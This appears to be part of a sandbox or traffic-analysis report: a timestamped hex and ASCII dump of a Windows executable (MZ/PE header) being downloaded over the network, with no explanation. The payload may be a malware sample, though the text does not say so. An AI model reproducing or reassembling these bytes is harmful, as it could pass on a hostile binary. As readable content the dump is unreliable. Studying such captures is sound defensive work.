                                                                                                                                                                                2021-11-11 11:27:09 UTC9831INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 76 f8 d1 d1 32 99 bf 82 32 99 bf 82 32 99 bf 82 26 f2 bc 83 39 99 bf 82 26 f2 ba 83 f3 99 bf 82 54 f6 42 82 33 99 bf 82 60 ec bb 83 23 99 bf 82 60 ec bc 83 38 99 bf 82 60 ec ba 83 7c 99 bf 82 87 ec bb 83 23 99 bf 82 87 ec ba 83 31 99 bf 82 26 f2 bb 83 26 99 bf 82 26 f2 b9 83 33 99 bf 82 26 f2 be 83 23 99 bf 82 32 99 be 82 96 99 bf 82 87 ec b6 83 30 99 bf 82 87 ec 40 82 33 99 bf
                                                                                                                                                                                Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$v222&9&TB3`#`8`|#1&&&3&#20@3
                                                                                                                                                                                2021-11-11 11:27:09 UTC9833INData Raw: f1 38 c8 10 64 fe 4e cd db 75 d1 89 be 5f b0 d6 e1 1f c5 a5 21 33 0f ac 5f a8 e6 08 fe bb dd 71 82 cb 32 7d 20 68 b6 49 ac 27 2f f5 78 7a 0c 42 ee 32 67 ae 0e 56 46 5d 9b 73 ac 75 f9 97 68 1e db d7 4a 2a 55 2b 26 60 56 4e 7b d8 f9 98 93 e2 e7 cc b7 7c bd f3 e6 43 dc 7c 90 f2 99 09 53 e3 f6 b7 74 7d 48 b7 37 bd 07 f3 b6 8c d3 b5 b5 4d c9 77 65 20 b9 96 8e 87 9f 1e 87 d9 51 6b 2f a0 db 61 7e ab e1 ae f0 a1 f9 5f 9f 10 a2 3b 7e 55 ac 4b fa 6b df ae f6 79 fb 4e f1 69 a5 a4 02 70 c8 71 9f ee e1 24 b4 cf e4 a2 b2 30 09 a8 35 e6 89 bb 97 d1 e1 39 f0 61 9b 50 60 78 92 70 e5 55 32 a9 7a 12 10 77 e5 58 f5 cf 8a 18 71 09 aa d6 da 45 30 ff b0 3b 3f 50 12 b8 2e 60 a3 43 78 49 a9 4f bf a4 af 06 f6 8d 3a e0 5a 90 c5 7c 06 59 1b b4 ca ed a1 e5 99 d5 1f 63 eb 46 f5 77 58
                                                                                                                                                                                Data Ascii: 8dNu_!3_q2} hI'/xzB2gVF]suhJ*U+&`VN{|C|St}H7Mwe Qk/a~_;~UKkyNipq$059aP`xpU2zwXqE0;?P.`CxIO:Z|YcFwX
                                                                                                                                                                                2021-11-11 11:27:09 UTC9834INData Raw: 19 e7 8f 6a 54 55 e9 85 fe 77 72 38 b8 bf fe 7b 75 75 72 e1 6e ea de 65 48 5c 80 18 6b 15 ed 9f 8b 24 c8 4e 6a a0 14 69 99 4a 5e a5 39 02 75 f9 14 ef ea b4 09 8e 69 4c 5f a6 32 9a 0d c5 4d b6 ea b9 ea b3 9f c6 ba f2 95 34 f7 79 cd c6 49 75 94 d8 97 67 b0 55 c3 91 19 a4 54 69 73 38 cb cf ec 5c c9 04 7a e3 66 65 c9 3e e7 65 c3 96 73 b2 73 ec 82 6b ce a9 62 a2 62 77 85 aa ba b5 cd fd f8 92 50 18 5a 88 11 94 fc da b4 a2 3c ec b6 e9 37 6c 43 84 e9 d7 2b 96 fd 87 73 15 82 27 51 5c a7 a4 84 a0 cc b0 1e ac 62 af a7 9a 28 28 d6 a1 0a 96 a1 da df 0f 7a 5c b6 a7 fc b9 b5 0d 5a 2f 24 63 c1 6e d8 11 61 91 2b c2 07 bb 27 b6 50 b8 d1 7b 81 6a 35 59 4f c4 83 02 7c 20 05 7c 2a 99 37 be ef 9a 7b c3 ca 3d 38 96 61 fe 29 18 49 dd db d8 08 ed f1 bc 1b 3d 78 f3 0c 3a 3b 82 c5
                                                                                                                                                                                Data Ascii: jTUwr8{uurneH\k$NjiJ^9uiL_2M4yIugUTis8\zfe>esskbbwPZ<7lC+s'Q\b((z\Z/$cna+'P{j5YO| |*7{=8a)I=x:;
                                                                                                                                                                                2021-11-11 11:27:09 UTC9835INData Raw: 65 fe 70 df 13 f3 af da dd 67 bb 5f 62 c7 31 12 76 d5 c5 ca 73 d6 e4 e9 01 2b de cd 8e 09 a0 94 f0 eb 0f ca e3 aa 20 cf 28 54 2c 07 b6 e4 6d d6 f8 b1 40 50 e6 b4 23 5f ed 50 94 73 93 a3 a8 0b 7c 95 24 64 0e ad 90 74 30 00 74 b2 35 b2 99 ee 26 e0 90 11 5b c9 90 77 a5 4c 4f 38 96 d3 10 ba 3f e7 de 93 73 7f f8 52 3b 69 0b 8b 50 7e 16 04 3f 10 1a 74 7c 43 95 b0 2d a6 d8 b9 84 2b e2 bb 4a a3 b4 95 c0 94 06 91 0c 5b a8 bf 9d c6 a3 81 86 82 4c 20 3a 1e 67 c2 b5 80 88 a8 87 80 32 1b ff 73 5d bf ca 13 bc b6 71 40 61 23 80 72 b9 37 d8 0b 4d d5 d6 63 b9 be 8e 6a 03 7f ea bf 7d a2 a2 60 a8 5f 40 53 6b a5 63 aa 21 e6 aa 54 db 13 00 97 7f 35 e2 ad 69 d3 b9 9e 4d a5 ec 39 c3 1d 4f fe 10 75 48 d2 c2 40 f2 9d 70 e7 da 6e 81 cb 0a e3 8f cf be 09 b7 cd 56 77 49 00 ce 2d 3b
                                                                                                                                                                                Data Ascii: epg_b1vs+ (T,m@P#_Ps|$dt0t5&[wLO8?sR;iP~?t|C-+J[L :g2s]q@a#r7Mcj}`_@Skc!T5iM9OuH@pnVwI-;
                                                                                                                                                                                2021-11-11 11:27:09 UTC9837INData Raw: e5 b3 da ea 83 2f a5 a8 5f 55 89 a7 ca 6c 1f 5b d8 bf 50 a7 4c e4 f6 6c 58 96 97 be 2b ec e7 48 11 7e eb 1c cb ba 8b 7f 50 82 9b 6f ad af 91 67 09 76 88 9f 21 54 ba aa 7c c2 fa 2c 12 d7 78 86 34 8c 6a 8e 68 91 54 6d 51 8b f0 8c 60 a1 b0 c9 b9 84 0f 8f 8d e1 41 f1 89 03 83 45 5d e6 44 34 3b 58 58 75 4a 1c be 75 43 a7 a8 ab 50 b2 b7 e4 55 9d 2e 2e ff bc f4 cc 0d 39 c8 26 5d 99 d7 db 07 c1 7d e7 44 43 a7 e5 74 b4 71 8f 71 a2 38 45 89 9b 92 5e 9a 18 b8 f5 4a da e4 74 49 39 f6 ce c9 41 37 3d 49 6a fb a7 81 7e c8 38 e3 e5 c3 af b9 77 9b 08 f7 66 e6 e4 a1 f3 6b 62 c7 47 db 37 68 48 bc f2 39 d9 27 59 b6 58 fd e6 0a bf 64 2a 2e e9 bc 64 38 7b f7 37 92 f9 99 18 d3 2b 57 5d 36 36 b7 64 10 ed a6 e9 7d 81 be 0f f9 24 3f 25 55 fc c9 b4 9f 30 70 7f 05 a0 08 b0 31 46 45
                                                                                                                                                                                Data Ascii: /_Ul[PLlX+H~Pogv!T|,x4jhTmQ`AE]D4;XXuJuCPU..9&]}DCtqq8E^JtI9A7=Ij~8wfkbG7hH9'YXd*.d8{7+W]66d}$?%U0p1FE
                                                                                                                                                                                2021-11-11 11:27:09 UTC9838INData Raw: a9 28 e5 3a b8 66 09 c9 f9 9d 5a 61 28 c9 ba 1c 83 a5 86 e2 c9 c5 8a f0 93 57 ac 95 57 24 2a 77 c4 96 a6 bb 99 0f e8 1f af 68 89 70 e7 62 fa f7 29 95 e1 e1 8a 03 4a a4 a9 73 77 8f d3 32 ca 83 50 88 20 6c 40 27 68 e9 ac 30 9a a1 94 9e b8 39 b0 98 d2 0e 8c 3c ea 64 88 a9 dc 64 c1 c0 7c a4 14 45 10 85 50 bb ce 71 94 01 dc e1 83 7c 20 35 78 14 b6 33 aa 67 a1 a0 72 59 09 71 81 40 60 70 f9 b2 90 27 c5 79 ed 59 f9 5f 5e 71 17 79 68 d7 b2 18 26 00 45 1c db e3 11 07 1b 1d 6e 48 a8 14 de f1 c7 c7 4a ab 29 75 79 a9 1f 44 93 c4 45 c1 7b 58 82 54 8b ef 52 52 81 38 a8 8c d8 74 9e 57 bd e8 c3 7e ea 32 fc b1 b5 e1 e4 33 e3 3b 29 6a e6 b5 eb 65 96 b3 b3 5f 79 1b 5d 54 dc 5f db 07 64 df 1c 57 b9 59 8a 10 b5 98 cc 73 85 7d 86 dd 4a 6b 73 2b 42 20 7c 52 e6 97 3b df ec 35 31
                                                                                                                                                                                Data Ascii: (:fZa(WW$*whpb)Jsw2P l@'h09<dd|EPq| 5x3grYq@`p'yY_^qyh&EnHJ)uyDE{XTRR8tW~23;)je_y]T_dWYs}Jks+B |R;51
                                                                                                                                                                                2021-11-11 11:27:09 UTC9839INData Raw: b4 d0 61 e9 2d 48 ad 1f b9 8e 02 9f 1e 31 86 05 df 2f 95 da 7c 25 bd 99 f8 6c c8 26 be 69 93 52 7e b0 aa 5d 96 6f 5a e9 b5 b9 ae 80 45 29 30 ef 1d 98 7a 41 2f ab 81 a6 3c 24 74 e8 e2 ca c4 cc 6a 3e b9 9b d4 5e 56 ff 7a 56 a3 dd a2 dc 8e 5c b1 44 76 4b f2 76 94 55 80 38 e4 c3 93 44 45 7d 85 e5 c6 9b b7 6b 2a 89 df 78 28 f0 f1 aa 10 d2 3c f1 4d 6b 6f c6 76 97 e8 b5 97 e6 85 4b 0c b6 b7 7e 2d da 4b 0b 54 db b5 b6 ec 49 63 8e 92 3f fa aa e8 9f a7 51 63 14 69 fa 6b c1 e0 31 70 e8 71 5c 01 81 a4 37 62 e1 07 f2 e3 41 49 88 81 b6 28 55 14 9a f0 75 97 e9 4b b7 17 de 42 e5 64 97 1f ae 5c 10 5a 9f 64 bf 6c bc 6d 16 e5 08 41 53 37 cd 6f 0b 7d 41 cd 88 35 7a 79 c1 18 51 f1 9f 37 8a 4d 97 43 82 68 fa b4 ba 0e 21 9a 35 15 b1 97 9b 8b e9 93 30 59 de bf ed e8 a9 7a 77 63
                                                                                                                                                                                Data Ascii: a-H1/|%l&iR~]oZE)0zA/<$tj>^VzV\DvKvU8DE}k*x(<MkovK~-KTIc?Qcik1pq\7bAI(UuKBd\ZdlmAS7o}A5zyQ7MCh!50Yzwc
                                                                                                                                                                                2021-11-11 11:27:09 UTC9841INData Raw: 1b 83 00 98 69 a3 2e 4c 16 e1 69 e9 ab fe a6 04 cd d7 86 3e 40 0a c8 06 d6 b7 f0 b0 f2 76 4b 48 95 4c 53 09 5a ec b8 75 0b 23 3a ee e2 ed 78 f4 4e 17 b7 c9 39 74 30 5a 19 88 ed 0b fa f5 fb 42 86 aa b8 d8 7e b3 cf ee 3f 40 8e d4 93 a5 2f 82 cf 89 1f f5 63 ef ee a4 e8 99 d0 69 73 2f ab 31 ad 98 16 6b b5 06 11 28 5d 09 11 1a af 67 ff 9d 7c 50 e3 ef 5d d2 6c 96 78 85 9f 22 16 35 e0 77 5d a2 25 57 da ef 28 c7 42 82 22 df bc a9 5a 71 ac f4 ad 67 16 89 8f 64 62 50 0e b9 c4 e8 1a 85 81 3b 16 40 23 3f 89 84 f5 97 b5 be 90 cd d0 35 ff 23 1b 56 93 09 9b 24 ad 75 e8 26 7a 06 04 31 4a 70 86 18 bb 6a 1d 26 24 d4 99 91 bb 0a 0e d4 28 76 f0 50 03 9f c8 f8 30 fe 9f ed ff 9f 3d d1 72 ea bd 71 65 c7 90 c5 13 8c 79 97 85 52 0a b9 ba 78 df 49 b9 fc 77 bf f2 a7 48 bf 25 13 1d
                                                                                                                                                                                Data Ascii: i.Li>@vKHLSZu#:xN9t0ZB~?@/cis/1k(]g|P]lx"5w]%W(B"ZqgdbP;@#?5#V$u&z1Jpj&$(vP0=rqeyRxIwH%
                                                                                                                                                                                2021-11-11 11:27:09 UTC9842INData Raw: aa 99 30 5a d4 89 69 f9 25 b7 58 8a 78 a9 4f a8 94 16 a2 2d 33 fd f7 af b6 82 58 28 82 30 0a 8d 61 2d de 3e 70 5c 57 47 d0 69 5c 93 b9 2a ec 5d 95 c0 bf 89 51 86 23 89 e7 48 80 83 59 e8 94 d1 4f 82 2f 2d eb d5 27 06 b6 e9 39 59 56 0a 88 8b bc 58 6d f6 f6 34 69 7f 93 d0 b3 d6 63 da 91 4e a8 20 74 41 b3 ff 3e db 69 d1 14 81 45 0c ff bb 30 95 c4 8a 14 a6 d9 ce f9 ed 97 14 b3 cb 6b 31 39 5d 4b e2 95 e7 77 8c aa a8 49 71 0a fe e5 91 04 e2 bb 25 ae 28 fe 0c a7 cc 42 20 0a 04 5f 5a a8 69 1c 9b 01 eb aa 2d 5b 09 36 ce 34 a9 6c 58 ff 14 36 2f 9d e6 b1 b9 2a 6d 91 eb 1d 9a 40 a0 75 ed 18 95 44 2c b3 d9 96 63 78 4e 4d 9b 4c de bb 38 a7 03 ab 09 66 50 99 9b d8 09 7b 1a 9c c6 5f 63 b0 44 70 af 49 fe 13 82 21 15 d1 88 99 30 e7 57 5c 79 ef 7f 9a 0b 44 d1 1e fa ae fa 52
                                                                                                                                                                                Data Ascii: 0Zi%XxO-3X(0a->p\WGi\*]Q#HYO/-'9YVXm4icN tA>iE0k19]KwIq%(B _Zi-[64lX6/*m@uD,cxNML8fP{_cDpI!0W\yDR
                                                                                                                                                                                2021-11-11 11:27:09 UTC9843INData Raw: a2 5d e1 27 b2 ba 62 75 54 b0 7b 71 ea ba 75 69 45 7c 93 ae 9f bd cc 45 15 35 4e 60 6a 04 87 63 fd 07 71 25 1f 9c 38 49 d2 34 72 96 32 01 e9 a8 63 7c 95 7d ff 5f c4 b5 3a b7 d7 e1 8d df fc d8 dd f9 e7 0b f2 ca 56 32 a5 6f 76 da 69 29 ce 09 cc 5c 29 98 64 05 e0 39 94 b2 b5 85 4c a3 e8 e6 41 a3 ed 8d e9 61 de 2e e9 71 51 d9 35 9e d2 f1 59 38 4d 54 41 af 04 57 e1 4f 51 bc 74 1d 36 d8 1b c8 29 30 dd f0 ae 08 e9 c5 4e 2e 5a e0 b3 0f ed 2e 02 e8 40 b9 f1 05 93 72 24 71 00 12 f1 d4 fe 11 f8 35 e1 b9 9d e1 9e c9 ce 64 bb 0d a7 4e 22 cc 6a 79 5c 8a 7a 75 61 07 e0 96 84 0e 09 a8 ca 43 ae 5b 63 d1 37 c5 48 d0 93 01 15 cb cf a3 e0 e4 95 43 3b 41 aa ad 21 4b 16 9c 97 c0 b0 e9 9a b7 e9 4b fb f7 cd 77 1e bd da 44 0b 2b ef cc 7b 64 cd 88 69 50 0f 8e 23 2e de 1e d8 49 28
                                                                                                                                                                                Data Ascii: ]'buT{quiE|E5N`jcq%8I4r2c|}_:V2ovi)\)d9LAa.qQ5Y8MTAWOQt6)0N.Z.@r$q5dN"jy\zuaC[c7HC;A!KKwD+{diP#.I(
                                                                                                                                                                                2021-11-11 11:27:09 UTC9845INData Raw: a5 db 14 6e 07 9a 05 ef c2 9c f4 9f 25 b8 09 06 44 99 16 b5 7a 93 7d 5d 3f b2 42 a0 bb 8f 52 f1 15 9b 75 96 09 b6 e2 ec 9b d8 52 ef 6a f1 87 62 7b ae 66 6b e9 05 8b 11 41 a3 c3 e9 b6 bd 56 67 98 bd 39 b1 3b 39 ed 0e 1a f7 08 f2 60 fc 5a cf 0b c0 d9 10 70 5f 63 cb 7c a5 ad 11 87 a2 00 78 3d cd 85 32 e8 f6 50 15 09 84 b5 b5 13 0a 1e 55 e4 37 1b c1 e9 91 5e fb ca 24 08 fc 7d 39 4d 94 29 6f 1a b5 15 33 6e a6 32 95 90 f3 53 e5 92 6b f4 4e aa 0b 14 58 51 9f 2f 04 4a 38 50 0a 48 a9 0a 3c 12 7a de a7 d5 c4 42 72 7f df 38 b5 4d 10 45 da 50 9d 62 46 8e f7 54 2f 2a 16 8b a8 41 dc a4 1a 3a 58 c0 17 96 88 bc 68 0c 7b c7 2c 0b 84 f9 6b 93 51 70 45 d7 26 d8 3a 59 37 e3 b6 cc f7 ff 07 a1 83 b2 9f a7 9b 37 74 d5 eb 57 21 52 0a 48 f6 af 69 dc 91 61 1f fc 74 62 28 30 5a 21
                                                                                                                                                                                Data Ascii: n%Dz}]?BRuRjb{fkAVg9;9`Zp_c|x=2PU7^$}9M)o3n2SkNXQ/J8PH<zBr8MEPbFT/*A:Xh{,kQpE&:Y77tW!RHiatb(0Z!
                                                                                                                                                                                2021-11-11 11:27:09 UTC9846INData Raw: 10 43 69 2b 05 81 c6 54 07 d9 8e 1d 50 31 e0 6b 4e b3 c9 f6 69 65 de 3b 35 77 f0 28 16 c2 89 55 86 c6 27 86 5c 21 83 c6 83 04 83 b0 bf 17 af 51 f9 0a d5 45 20 b7 e1 b9 96 89 a1 aa 53 ed f5 14 e6 68 e1 6f ea 65 18 8f d1 10 db 2f e7 df ae b5 c9 b0 09 c0 99 49 e2 5f b9 59 f0 6a b6 50 b6 5b ea 09 b9 37 62 e8 6f d9 e6 81 55 d8 80 09 c5 20 87 06 a4 37 08 bc c2 17 24 89 18 6e 23 34 be 7f 33 bd 91 14 38 d9 95 df 8e 09 a3 72 ec f8 ea ef 18 71 22 53 c6 bf 91 eb 96 73 f1 9b 6d 34 21 37 2e 6b 31 76 48 a5 fd f5 8c 61 bf db 3d 6c 59 d3 66 84 eb 6e 31 a4 52 5c 70 15 4a b0 a7 2c c1 5e 04 84 1d b0 f7 17 c9 30 34 03 ae d8 ef 40 de ec 2a b3 9c 8d 35 61 e0 e0 17 22 de 97 3f 96 51 f6 8b 94 62 0e c6 b9 58 80 b6 69 e9 c2 b6 ae 4a c9 96 a7 58 e6 b6 ae c9 42 83 03 24 ab 43 7e 05
                                                                                                                                                                                Data Ascii: Ci+TP1kNie;5w(U'\!QE Shoe/I_YjP[7boU 7$n#438rq"Ssm4!7.k1vHa=lYfn1R\pJ,^04@*5a"?QbXiJXB$C~
                                                                                                                                                                                2021-11-11 11:27:09 UTC9847INData Raw: 73 cb 05 79 31 7c 1b e1 48 d3 26 39 47 c0 45 8e 4c cf c0 36 0e 76 91 e7 f5 72 4b 78 76 40 46 e1 3a e2 8d 29 f5 02 74 53 ef 6c e6 b3 2c 4b 62 7b 8c 97 58 b3 6f 99 29 28 2e c1 aa 5c b7 09 a3 f1 fe e2 a8 40 6f e6 bf d9 7a b9 03 e6 76 61 61 d1 19 58 eb 5d 5f 51 bd a8 36 97 57 b0 60 7b 9c a6 98 84 f1 29 d0 a8 18 3f 60 8a 72 7c c5 57 fa bd 2b 9a 10 86 b8 b9 d6 cd 13 e1 e3 ac 83 b2 8a 88 3c 76 b8 a1 56 f6 25 e4 73 87 03 fe 16 49 2f b2 13 59 f8 d9 50 f7 8d b3 3a 93 53 a0 13 61 68 2e 76 91 90 40 08 14 5c 1b 77 d7 3d b9 41 68 90 1f dc 6b 6a 3f 44 1b 46 b7 69 cd 91 5b 28 df af 8f df 28 92 fa fc 6b 82 2a 67 55 93 41 cd aa 36 ff 48 e2 a5 b7 bf 00 d7 e8 3a 4f 73 48 76 34 b0 fb 3c 9b 62 67 50 16 fe 96 29 c4 73 ea 62 c8 ca 59 e9 c9 04 ec d7 f6 70 57 33 ea 9f db 63 21 18
                                                                                                                                                                                Data Ascii: sy1|H&9GEL6vrKxv@F:)tSl,Kb{Xo)(.\@ozvaaX]_Q6W`{)?`r|W+<vV%sI/YP:Sah.v@\w=Ahkj?DFi[((k*gUA6H:OsHv4<bgP)sbYpW3c!
                                                                                                                                                                                2021-11-11 11:27:09 UTC9849INData Raw: 89 2b f2 02 83 bf df 8d c8 7b 16 30 80 aa 7f 66 3b fc 58 45 ea f6 a4 15 c5 37 87 1f dc 69 6e be f0 b7 65 8a b8 cb 56 a7 ea 2d a4 15 c4 b8 ef 8a 05 66 ed 8a 3d 3d 96 d3 23 ac a9 44 61 3d a3 d2 2b 0d bb e9 24 11 5c e5 39 7f 4e 67 2b 20 14 25 77 df c5 17 b4 bc 47 dc b4 8f 25 13 6a 22 63 7e a5 b8 0e 0e ea b6 37 ce 91 a6 f3 76 84 f7 87 02 58 73 e1 32 72 be f4 03 36 95 f7 2e f1 68 2b 53 1a a0 c6 e1 ea 67 2f ba cb 0a 8f d2 e9 de ff d4 0d 51 b0 6c 89 e7 09 7c 8c aa 15 0c 88 cf 86 b1 f5 b4 58 04 3e 9d 6f bb b1 fc d9 14 0d da e4 5f 59 e7 d8 b5 ed d6 13 a9 6c e9 f0 99 58 db 60 29 8f 37 d1 04 7d 4e ea a6 11 e6 78 30 b9 52 8c 0c 80 7a 9e 24 fd 6f 69 e3 81 9b e6 76 5d 41 fe d7 9c d1 43 f4 e0 23 a1 46 cd 96 3b 85 d9 bf ce 3c 39 29 84 98 a4 c9 e6 74 84 a7 53 52 e9 67 89
                                                                                                                                                                                Data Ascii: +{0f;XE7ineV-f==#Da=+$\9Ng+ %wG%j"c~7vXs2r6.h+Sg/Ql|X>o_YlX`)7}Nx0Rz$oiv]AC#F;<9)tSRg
                                                                                                                                                                                2021-11-11 11:27:09 UTC9850INData Raw: aa 6d 8b 5c 57 22 78 0c 26 da ff 7a ba 8c be 4e bf f5 e8 f4 0a ff c9 ef 97 0f e3 a2 36 8c 76 f9 f1 a8 c1 da 37 04 13 86 b4 a7 76 bb 72 ce 9f 75 3b bf 48 36 a2 e2 2a 08 78 f2 89 f0 97 9e 85 c2 2e bd 57 aa 8c 76 9a ea 4f 2e 57 53 68 d5 76 3d cc 79 d2 c0 a1 95 41 26 df 6e 3d 21 39 b6 6b e0 24 96 07 9d 1f be 13 4d 50 45 f8 39 f8 34 ef c1 d2 eb 82 8b 19 78 18 59 d0 94 c9 6e 6e 4e 3e 62 07 e0 c3 e0 47 d7 51 e2 b7 e9 93 d8 68 6c 79 da 68 a8 5b dd 89 86 17 b2 5e 8e e0 e2 5f 9b 59 98 97 48 5b a7 b0 4d 0c b5 63 a0 73 52 7c eb bf 79 29 24 ff 4d 46 dc c3 36 37 8e 99 f9 97 d6 fa 76 00 18 8e 2a d9 8e 07 3a f0 25 58 31 bc 1d a9 a7 d3 15 f1 e9 37 c4 dd f0 64 18 6e e5 b8 50 a7 32 88 e6 2f c1 ec d8 91 99 2b c4 0c b2 8e 80 2a 8e 2f dc 8e fb 13 5b 8a 22 e7 25 95 69 e1 9a de
                                                                                                                                                                                Data Ascii: m\W"x&zN6v7vru;H6*x.WvO.WShv=yA&n=!9k$MPE94xYnnN>bGQhlyh[^_YH[McsR|y)$MF67v*:%X17dnP2/+*/["%i
                                                                                                                                                                                2021-11-11 11:27:09 UTC9851INData Raw: 78 16 0e 07 ca 87 25 54 af a0 fc b6 c8 67 60 b0 22 0d 89 e6 4d 3d f3 7c 70 84 f4 f5 68 1b 3d 90 36 fa 22 49 55 95 6a 91 73 ca 36 e9 98 fe ec 70 60 48 75 91 ea ca f9 01 a8 f9 e0 57 e6 10 8f 73 9e f3 7d 3b 03 eb 6d 48 68 75 63 7d 57 27 12 f6 ee 23 a2 31 2e 03 ed bb e5 7e 64 95 aa d0 3d b4 47 33 52 4b 27 1d dd 16 9c f8 9a 68 8d e2 9f f3 ae e1 ca 6a 01 a3 92 9e 85 ab 3b d3 81 42 34 37 a6 bf f9 92 92 ac 5e 8b da 89 f2 f5 46 65 44 5f c2 5a 2a 4d 73 68 eb 88 a1 4a fd eb 86 8a 5c 94 46 f9 09 09 55 23 4e 4f fa 20 42 24 6a 21 ba f8 ac 2c c1 f4 24 00 93 5a ec a9 75 cb 3b 3a d4 b1 0b ac cd 4a 3c 51 d7 6c 06 e8 bc 40 ac b8 e9 70 af b1 cd e2 03 e3 fc b3 21 0e 8c 42 ef fe 2b ef e7 20 c2 cb 76 40 37 b1 6c 85 8e 69 25 45 44 69 e8 09 fa be 2a 9e 55 48 09 af e1 6f 03 18 4d
                                                                                                                                                                                Data Ascii: x%Tg`"M=|ph=6"IUjs6p`HuWs};mHhuc}W'#1.~d=G3RK'hj;B47^FeD_Z*MshJ\FU#NO B$j!,$Zu;:J<Ql@p!B+ v@7li%EDi*UHoM
                                                                                                                                                                                2021-11-11 11:27:09 UTC9853INData Raw: 31 81 bd b4 b8 10 6f 39 53 c3 16 59 ca 1e b6 be aa 4f 56 94 c9 bf 4b e9 fb 52 7d 82 00 5a 75 be a6 12 6c 8d 13 14 f5 eb 17 c4 86 6a ce 25 0b e1 b5 77 b3 9c e8 52 a7 bc d7 8b be f1 74 f9 3c ba 5c 3a 54 8e 54 33 e1 66 4c 9b f0 b6 4e 9c cd 5a 6c cb 98 18 49 de 10 04 60 b7 88 26 41 72 52 c2 d4 29 c9 8d 4a eb 2b c3 6f 82 33 90 09 2d ee 57 b3 7f 75 bc 79 85 44 ef 1b 27 34 2a ad 94 9f ae ab e9 58 12 b1 5e 00 69 7c 22 6b 82 f7 60 89 0d 55 f7 7e cc 25 89 8c ba 5a 0b 75 92 52 ed 89 2f b2 e2 8c 06 a0 9d 37 e2 4e 4e f5 4d 07 4c fe 7f 5c f6 ac ea 63 ea b8 ee f0 5a 63 ef e7 ff 03 c6 e8 64 17 c2 07 ab 22 ee 5d 7a f6 ae b7 9b 69 66 50 9d 10 17 91 4b 05 f5 77 88 01 1a 80 6d 6f ea d5 81 79 34 57 49 7b 78 af 0b 5e 3b b4 bc 54 3b 3f 24 83 21 2b 49 72 80 d4 16 24 37 08 1d 7a
                                                                                                                                                                                Data Ascii: 1o9SYOVKR}Zulj%wRt<\:TT3fLNZlI`&ArR)J+o3-WuyD'4*X^i|"k`U~%ZuR/7NNML\cZcd"]zifPKwmoy4WI{x^;T;?$!+Ir$7z
                                                                                                                                                                                2021-11-11 11:27:09 UTC9854INData Raw: 61 6d 73 f2 97 80 be 6a fa bd cc 92 e8 ba 20 e8 fa 92 4a 71 52 47 70 b7 ea 30 b2 a1 93 0b 55 e1 8b ab 76 c6 22 f7 2a 05 d0 4f 6e 5f aa 44 83 67 60 bf 46 de 57 ba 4e 78 47 29 87 13 ea e6 0b 44 e9 b7 ab 21 98 30 70 08 3d e4 2d e1 10 4a 6d ab a3 30 4f c0 72 37 4a 7e a7 d9 d7 a9 66 dd 89 25 e1 63 f3 8e 0c 19 2e 7b 8e 70 5a 61 58 d6 fd 5d d9 bf b5 83 86 fa 63 a2 d1 13 2a 73 89 65 e1 d6 9c 8e 0c 30 fa 67 65 f6 f9 e1 68 1c ea 52 b1 6a 0a 95 9b 7f 5e 2f 1f 02 e9 38 73 76 e5 c5 63 62 b9 bf 68 d9 c9 ad 42 d0 b1 b9 4d 8f 1c 48 09 aa a9 8b 57 7c 0d 00 f5 e2 13 c3 a1 40 76 0d 48 84 93 4a 9b d8 20 49 e6 56 89 b7 49 d9 da 81 23 e5 19 93 e2 36 f4 48 de 69 d7 64 fa c5 d9 19 28 cb bc 71 dd e1 54 68 b6 fd 9e b9 8b ce 70 60 18 d9 db 16 8a ef 29 b2 f5 95 f1 72 b4 43 cb d2 d8
                                                                                                                                                                                Data Ascii: amsj JqRGp0Uv"*On_Dg`FWNxG)D!0p=-Jm0Or7J~f%c.{pZaX]c*se0gehRj^/8svcbhBMHW|@vHJ IVI#6Hid(qThp`)rC
                                                                                                                                                                                2021-11-11 11:27:09 UTC9855INData Raw: f7 da b8 ab b2 88 f9 e9 28 2a 2d b2 b9 4f f9 8c 6f 2f a1 eb 0f 8a 81 e2 34 5d aa e5 49 b4 e1 6d fa bb f1 e7 5c eb b2 7b c9 0e b0 71 23 e5 2c 28 d4 84 9e 8a 02 e6 6b 3e 33 45 2a 9b 5b b7 34 0f 07 ed 43 71 bb 20 40 79 a9 d6 49 64 89 2b c1 6c 22 53 73 e0 ff 97 31 f1 9f 32 31 da d5 3d 86 e9 35 ea c1 19 2d 6d 81 c5 2a 9f fb 09 4c ba ad 88 cc 6e af 48 58 2e c1 e1 8d 1b b5 11 be 79 a1 3a 4f a7 6d 89 cb ad 57 99 4a f6 60 b9 31 d6 fc 1d 2f c8 29 fd 87 b5 bd 29 d9 6e 65 fa 4f a7 27 54 80 2a a7 04 3a 86 29 ab 68 b0 71 29 7a 9d fc 21 3f 6a f1 bb df 97 d1 f1 ff 32 57 39 4a 56 5e 9e 9d aa 2d 91 8f 2b 61 69 9d 87 b5 6a bd 2d 31 e1 cb 1a b5 c1 bf 3f a1 c0 b4 a7 43 e9 38 ad 71 f1 5f 32 57 99 49 f6 e8 76 0f a0 7b d1 ba ad 16 95 97 ff 19 e3 1f e9 13 05 9e e8 43 84 18 39 61
                                                                                                                                                                                Data Ascii: (*-Oo/4]Im\{q#,(k>3E*[4Cq @yId+l"Ss121=5-m*LnHX.y:OmWJ`1/))neO'T*:)hq)z!?j2W9JV^-+aij-1?C8q_2WIv{C9a
